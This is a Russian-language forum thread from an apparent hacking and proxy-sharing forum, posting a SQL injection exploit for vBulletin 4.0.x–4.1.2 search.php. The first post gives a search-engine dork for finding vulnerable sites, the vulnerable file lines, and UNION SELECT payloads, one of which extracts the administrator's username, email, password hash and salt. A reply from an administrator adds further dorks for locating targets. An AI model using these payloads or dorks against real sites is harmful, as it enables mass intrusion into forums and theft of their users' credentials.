Ваш ключ: необходима авторизация | MyProxy - бесплатный обменник валидных прокси между пользователями форума.

vBulletin 4.0.x - 4.1.2 - (search.php) SQL Injection Vulnerability

Тема в разделе vBulletin, создана пользователем Hresh, 28 дек 2014.

Войдите для ответа
  1. Hresh Местный

    Hresh
    Статус:
    Вне сети
    Сообщения:
    192
    Симпатии:
    31
    Регистрация:
    01.06.15
    Version: 4.0.x


    Dork : inurl:"search.php?search_type=1"


    --------------------------


    # ~Vulnerable Codes~ #


    --------------------------


    /vb/search/searchtools.php - line 715;


    /packages/vbforum/search/type/socialgroup.php - line 201:203;


    --------------------------


    # ~Exploit~ #


    --------------------------


    POST data on "Search Multiple Content Types" => "groups"


    &cat[0]=1) UNION SELECT database()#


    &cat[0]=1) UNION SELECT table_name FROM information_schema.tables#


    &cat[0]=1) UNION SELECT concat(username,0x3a,email,0x3a,password,0x3a,salt ) FROM user WHERE userid=1#



     
    28 дек 2014 #1
    Последнее редактирование модератором: 28 дек 2014
  2. ERROR404 Администратор

    ERROR404
    Статус:
    Вне сети
    Правильные дорки:


    "Powered by vBulletin™ Version 4.0.8"


    "Powered by vBulletin™ Version 4.1.12"


    "Powered by vBulletin™ Version 4.0.2"


    и пр. Так будет проще найти
     
    28 дек 2014 #2
Загрузка...
Похожие темы
  1. ERROR404
    Ответов:
    1
    Просмотров:
    558
  2. ERROR404
    Ответов:
    0
    Просмотров:
    405
  3. ERROR404
    Ответов:
    0
    Просмотров:
    358
  4. ERROR404
    Ответов:
    0
    Просмотров:
    365
  5. ERROR404
    Ответов:
    0
    Просмотров:
    326
Top